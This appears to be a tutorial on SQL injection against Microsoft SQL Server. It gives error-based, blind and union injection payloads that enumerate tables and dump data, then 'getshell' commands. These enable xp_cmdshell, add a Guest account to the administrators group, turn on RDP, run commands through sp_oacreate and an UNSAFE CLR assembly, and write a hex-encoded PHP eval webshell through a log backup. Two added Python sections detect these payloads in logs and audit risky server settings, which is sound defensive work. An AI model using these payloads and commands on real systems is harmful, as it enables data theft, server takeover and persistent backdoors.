Article directory
- 1. MSSQL database
- 2. MSSQL structure
- 3. MSSQL key tables
- 4. Common MSSQL functions
- 5. MSSQL error-based injection
- 6. MSSQL blind injection
- 7. Union injection
- 8. Injection process
- 9. getshell
1. MSSQL database
MSSQL is a strongly typed database: it strictly distinguishes between numeric and character data.
2. MSSQL structure
There are four default databases:
- 1. master (the important one): stores the configuration, permissions, database definitions and other information the SQL Server instance needs.
- 2. model: the template database. Whenever a new database is created (including the system database tempdb), a copy of model is made and renamed to the name given when the database was created.
- 3. msdb: the agent database, used by SQL Server Agent for alerts, scheduled jobs, etc.
- 4. tempdb: temporary storage for data generated while the system runs, such as user-defined temporary tables, indexes, etc.
3. MSSQL key tables
1. sysdatabases table in the master database
Holds all database names. The sysdatabases table exists only in the master database. Its main field is name (the database name).
2. sysobjects table
This system table exists in every database, whether user-created or a system default. It stores all table names of the current database (similar to the tables table in MySQL's information_schema). Main fields: name (table name), id (table ID), xtype (type of the created object).
When xtype='U', the row represents a user-created table.
- Note the difference from the MySQL metadata path:
Mysql: information_schema.tables
Mssql: master.dbo.sysobjects
3. syscolumns table
This system table exists in every database, whether user-created or a system default.
It stores all column names of the current database. Main fields: name (column name) and id (table ID). The id is the table's ID number obtained from the sysobjects table.
4. Common MSSQL functions
Function | Effect
---|---
db_name() | Returns the name of the current database
host_name() | Returns the computer (host) name
current_user | Returns the current database user name
user | Database user
substring() | String slicing function
@@version | Returns the database version
char() | ASCII-to-character conversion
cast(text as type) | Type conversion; if the conversion fails, the text value is reported in the error and displayed on the page
object_id() | Returns the table ID for a given table name
object_name() | Returns the table name for a given ID
col_name(object_id, column_id), e.g. col_name(object_id('users'),2) | Returns the name of the specified column in the specified table
5. MSSQL error-based injection
Since MSSQL is strongly typed, an error is raised as soon as data types do not match. We can take advantage of this by using arithmetic operations between integer and character data, for example 1+user.
Example POC: ' or 1=convert(int,@@version)--
6. MSSQL blind injection
Similar to MySQL; the difference is in the functions used.
The following functions are commonly used for blind injection:
- 1. patindex(pattern,string)
  Returns the position at which a character or pattern first appears in a string.
- 2. replace(string,substring1,substring2)
  Replaces a substring that appears in the string with another string, i.e. every occurrence of substring1 in the string is replaced with substring2.
  Example: replace('1-a 2-b','-', ':') returns 1:a 2:b
- 3. replicate(string,n)
  Repeats the string the specified number of times.
  Example: replicate('abc',3) returns abcabcabc
- 4. stuff(string,pos,delete_length,insertstring)
  First deletes part of the string, then inserts a new substring in its place.
  Example: stuff('xyz',2,1,'abc') returns xabcz
- 5. upper(string) and lower(string)
  Convert the string to uppercase or lowercase.
- 6. rtrim(string) and ltrim(string)
  Remove trailing or leading spaces from the string.
- 7. charindex(expression1, expression2, [start_location])
  Returns the starting position of the specified expression in the string: if it is found, the position is returned, otherwise false. Note that the charindex arguments are not case-sensitive.
7. Union injection
1. Get the number of columns of the current table
id=-1 order by 4--+
4 does not report an error, 5 reports an error
2. Get the current database name
id=-1 union all select 1,2,db_name(),4--+
Returns: mozhe_db
3. Get the table name
id=-1 union all select top 1 1,2,name,4 from mozhe_db.dbo.sysobjects where xtype='U'--+
Returns: manage
To get the next table, use the usual method: add and name !='manage' after the where clause and the next table name is shown.
4. Get the table id
id=-1 union all select 1,id,3,4 from sysobjects where name='manage'--+
Returns: 5575058
5. Get the table's column names
id=-1 union all select top 1 1,2,name,4 from syscolumns where id=5575058 --+
Returns: username
To get the next column name, use the same method: add and name !='username' after the where clause and the next column name is shown.
6. Get the data in the username column of the manage table
id=-1 union all select top 1 1,2,username,4 from manage --+
Returns: admin_mz
To get the next row, use the same method and append where username !='admin_mz' at the end; the next value is shown.
8. Injection process
1. Check privileges
If the page echoes normally, the condition is true; otherwise an error is reported. Example POC:
and 1=(select IS_SRVROLEMEMBER('sysadmin')) --
2. Get the current database
and 1=(select db_name()) --
3. Get all tables in the current database
and 1=convert(int,(select quotename(name) from database_name.dbo.sysobjects where xtype='U' FOR XML PATH(''))) --
Note:
The convert function forces a data type conversion.
The main job of the quotename function is to wrap column names, table names, etc. in [], '' and so on inside stored procedures so that the SQL statement executes correctly.
FOR XML PATH returns the result set as XML, putting multiple result rows on one line.
4. Get all columns of a specified table in the current database
and 1=(select quotename(name) from database_name.dbo.syscolumns where id=(select id from database_name...sysobjects where name='specified_table_name') FOR XML PATH('')) --
5. Get the table data in the specified database
and 1=(select top 1 * from specified_database.dbo.specified_table where exclusion_condition FOR XML PATH('')) --
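From the defender's side, the payload shapes in sections 5 through 8 (type-conversion errors, sysobjects/syscolumns enumeration, FOR XML PATH folding, stacked sp_configure calls) are easy to spot in web access logs. The following Python detector is an added example, not code from the original post; the log format and the sample lines are constructed for this illustration.

```python
import re
from urllib.parse import unquote_plus
# One regex per technique from sections 5-8, matched against the decoded request.
RULES = {
    "error-based type conversion": re.compile(r"\b(convert|cast)\s*\(\s*int\b", re.I),
    "metadata enumeration": re.compile(r"\b(sysobjects|syscolumns|sysdatabases)\b", re.I),
    "union-based": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "row folding (FOR XML PATH)": re.compile(r"\bfor\s+xml\s+path\b", re.I),
    "privilege probing": re.compile(r"\bis_srvrolemember\s*\(", re.I),
    "command execution": re.compile(r"\b(xp_cmdshell|sp_oacreate|sp_oamethod)\b", re.I),
    "config tampering": re.compile(r"\b(sp_configure|reconfigure)\b", re.I),
    "log-backup file write": re.compile(r"\bbackup\s+(log|database)\b.*\bto\s+disk\b", re.I),
}
# Request target inside a combined-format access-log line (constructed format).
LOG_RE = re.compile(r'"(?:GET|POST)\s+(?P<url>\S+)\s+HTTP/[\d.]+"')

def decode_request(line):
    """Extract the request target and URL-decode it up to three times so that
    double-encoded payloads are normalised; returns "" if no request is found."""
    m = LOG_RE.search(line)
    if not m:
        return ""
    text = m.group("url")
    for _ in range(3):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return text

def classify(line):
    """Names of every rule the line matches, in RULES order (empty if clean)."""
    req = decode_request(line)
    return [name for name, rx in RULES.items() if rx.search(req)]

def scan(lines):
    """Map each suspicious line to its matched techniques; clean lines are omitted."""
    return {line: hits for line in lines if (hits := classify(line))}

# Constructed sample traffic; the payload shapes mirror the ones shown in the post.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /news.php?id=3 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /news.php?id=1%27+or+1%3Dconvert%28int%2C%40%40version%29-- HTTP/1.1" 500 0',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /news.php?id=-1+union+all+select+top+1+1%2C2%2Cname%2C4+from+sysobjects+where+xtype%3D%27U%27--%2B HTTP/1.1" 200 700',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /news.php?id=1%3Bexec+sp_configure+%27xp_cmdshell%27%2C1%3Breconfigure%3B-- HTTP/1.1" 200 512',
]
if __name__ == "__main__":
    for line, techniques in scan(SAMPLE_LOG).items():
        print(techniques, "<-", decode_request(line))
```

The 500 status on the error-based line is itself a useful secondary signal: type-conversion probes produce server errors that the normal id=3 request never does.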
9. getshell
1. MSSQL permissions
- sa: database operations, file management, command execution, registry reads, etc. (Windows analogue: system). It is the highest MSSQL privilege level.
- db_owner: file management, database operations, etc. (Windows analogue: users/administrators).
- public: database operations only (Windows analogue: guest/users).
2. Enable xp_cmdshell with sa privileges to gain host access
1) Determine whether xp_cmdshell is open
select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell'
Returns 1 for open, 0 for closed
- If xp_cmdshell is not enabled, the following commands enable it (the first four steps do the enabling):
execute('sp_configure "show advanced options",1') -- set this option to 1
execute('reconfigure') -- save the setting
execute('sp_configure "xp_cmdshell", 1') -- set xp_cmdshell to 1
execute('reconfigure') -- save the setting
execute('sp_configure') -- view the configuration
execute('xp_cmdshell "whoami"') -- run a system command
- or:
exec sp_configure 'show advanced options',1;
reconfigure;
exec sp_configure 'xp_cmdshell',1;
reconfigure;
exec sp_configure;
exec xp_cmdshell 'whoami';
- Once system commands can be executed, and provided the obtained host account is in the administrators group:
exec xp_cmdshell 'net user Guest 123456' -- set a password for the Guest user
exec xp_cmdshell 'net user Guest /active:yes' -- activate the Guest user
exec xp_cmdshell 'net localgroup administrators Guest /add' -- add the Guest user to the administrators group
exec xp_cmdshell 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f' -- enable port 3389 (RDP)
Even when step 1) returns 1 (xp_cmdshell is present), the command still may not run: execute('xp_cmdshell "whoami"') fails because this procedure is disabled by default.
2) Then use the execute steps above to enable xp_cmdshell
3. Use sp_oacreate to execute system commands with sa privileges
Prerequisite for sp_oacreate: the SQL Server service has not been de-privileged.
We can use the COM component sp_oacreate in SQL Server to execute system commands.
1) The following commands check whether sp_oacreate is allowed:
declare @shell int
exec sp_oacreate 'wscript.shell',@shell output
exec sp_oamethod @shell,'run',null,'whoami'
2) Enable sp_oacreate
EXEC sp_configure 'show advanced options', 1;
-- similar to execute('sp_configure "show advanced options",1')
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'Ole Automation Procedures', 1;
RECONFIGURE WITH OVERRIDE;
It can be seen from this that sp_oacreate produces no echo.
3) Run an add-user command as a test
declare @shell int
exec sp_oacreate 'wscript.shell',@shell output
exec sp_oamethod @shell,'run',null,
'c:\windows\system32\cmd.exe /c net user hack Password@ /add'
-- the SQL above is fixed; the last line is the system command that gets executed
4. Execute system commands with sa privileges via CLR
There are two ways to create the CLR assembly:
- from a DLL file
- from a hexadecimal byte stream
Enable CLR:
exec sp_configure 'show advanced options', 1;
RECONFIGURE;
Exec sp_configure 'clr enabled', 1;
RECONFIGURE;
If there is a permission problem, run the following:
alter database [master] set TRUSTWORTHY on -- an UNSAFE assembly is imported next, so mark the database as trustworthy
EXEC sp_changedbowner 'sa'
Import the assembly:
CREATE ASSEMBLY [WarSQLKit]
AUTHORIZATION [dbo] FROM <hexadecimal byte stream>
WITH PERMISSION_SET = UNSAFE;
CREATE PROCEDURE sp_cmdExec @Command [nvarchar](4000) WITH EXECUTE AS CALLER
AS EXTERNAL NAME WarSQLKit.StoredProcedures.CmdExec;
Execute a command:
EXEC [dbo].[SqlStoredProcedure1]; for example: exec sp_cmdExec 'whoami'
Drop the assembly:
DROP PROCEDURE sp_cmdExec;
DROP ASSEMBLY [WarSQLKit];
5. db_owner privilege: LOG backup getshell
Whether a LOG backup or a differential backup is used, the idea is to write a one-line webshell during the backup process.
1) Common SQL Server backup strategies
- Weekly full backup
- Daily differential backup
- Hourly transaction log backup
2) Prerequisites
- The target already has a database backup file. In other words, if we use the test database, test must already have a backup file, and its recovery model must be FULL.
- The absolute path of the website is known
- Stacked queries are supported
3) Injected code
alter database database_name set RECOVERY FULL; -- change the database recovery model to FULL
create table cmd (a image); -- create a table cmd with a single column a of type image
backup log database_name to disk= 'C:\phpstudy\WWW\1.php' with init; -- back up to the specified path
insert into cmd (a) values(0x3c3f70687020406576616c28245f504f53545b785d293b3f3e);
-- insert the one-liner into the cmd table; the hex is the one-line webshell <?php @eval($_POST['x']);?>
backup log database_name to disk='C:\phpstudy\WWW\2.php'; -- back up the transaction log to the specified file
drop table cmd; -- drop the cmd table
6. Overview
As with MySQL, a log backup is used to write a one-line webshell into the log.
Set the database recovery model to FULL, then create a table and take a backup to the specified path.
Insert the one-line webshell into the table, back up the log to a path we know, and finally drop the created table.
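Every getshell path in section 9 depends on a server setting that is off by default: xp_cmdshell, Ole Automation Procedures, clr enabled, and for the CLR path a TRUSTWORTHY database owned by a sysadmin. The audit below is an added example, not code from the original post; it takes rows shaped like the output of EXEC sp_configure and a few sys.databases columns (constructed here, as a real script would fetch them from the instance) and reports the combinations the post relies on.

```python
# Settings section 9 turns on before executing commands; all three default to 0.
DANGEROUS_OPTIONS = {
    "xp_cmdshell": "xp_cmdshell enabled: OS commands can be run from T-SQL",
    "Ole Automation Procedures": "Ole Automation enabled: sp_oacreate can spawn processes",
    "clr enabled": "CLR enabled: user assemblies can execute inside the engine",
}
def audit_configure(rows):
    """rows: (name, config_value, run_value) as printed by EXEC sp_configure.
    A value set but not yet RECONFIGUREd (config 1, run 0) is flagged as well."""
    findings = []
    for name, config_value, run_value in rows:
        if name not in DANGEROUS_OPTIONS:
            continue
        if run_value == 1:
            findings.append(("high", DANGEROUS_OPTIONS[name]))
        elif config_value == 1:
            findings.append(("medium", f"{name} set to 1 but RECONFIGURE not yet run"))
    return findings

def audit_databases(dbs, clr_enabled):
    """dbs: (name, is_trustworthy_on, owner_login, recovery_model). TRUSTWORTHY ON with a
    sysadmin owner is what lets PERMISSION_SET = UNSAFE assemblies load (the CLR path);
    FULL recovery is a precondition of the log-backup path, so it is reported as info."""
    findings = []
    for name, trustworthy, owner, recovery in dbs:
        if trustworthy and owner == "sa":
            sev = "high" if clr_enabled else "medium"
            findings.append((sev, f"{name}: TRUSTWORTHY ON and owned by sa"))
        elif trustworthy:
            findings.append(("low", f"{name}: TRUSTWORTHY ON"))
        if recovery == "FULL":
            findings.append(("info", f"{name}: FULL recovery model, log backups possible"))
    return findings

def audit(config_rows, db_rows):
    """Run both checks; the CLR state from sp_configure feeds the database check."""
    clr = any(n == "clr enabled" and rv == 1 for n, _, rv in config_rows)
    return audit_configure(config_rows) + audit_databases(db_rows, clr)
# Constructed snapshot of a server where part of section 9 has been carried out.
SAMPLE_CONFIG = [
    ("show advanced options", 1, 1),
    ("xp_cmdshell", 1, 1),
    ("Ole Automation Procedures", 1, 0),  # set, but RECONFIGURE never ran
    ("clr enabled", 0, 0),
]
SAMPLE_DBS = [
    ("appdb", 1, "sa", "SIMPLE"),  # constructed user database
    ("mozhe_db", 0, "webapp", "FULL"),
]
```

The half-applied Ole Automation setting is worth a medium finding on its own: sp_configure followed by no RECONFIGURE is exactly the trace an interrupted attempt at section 9 leaves behind.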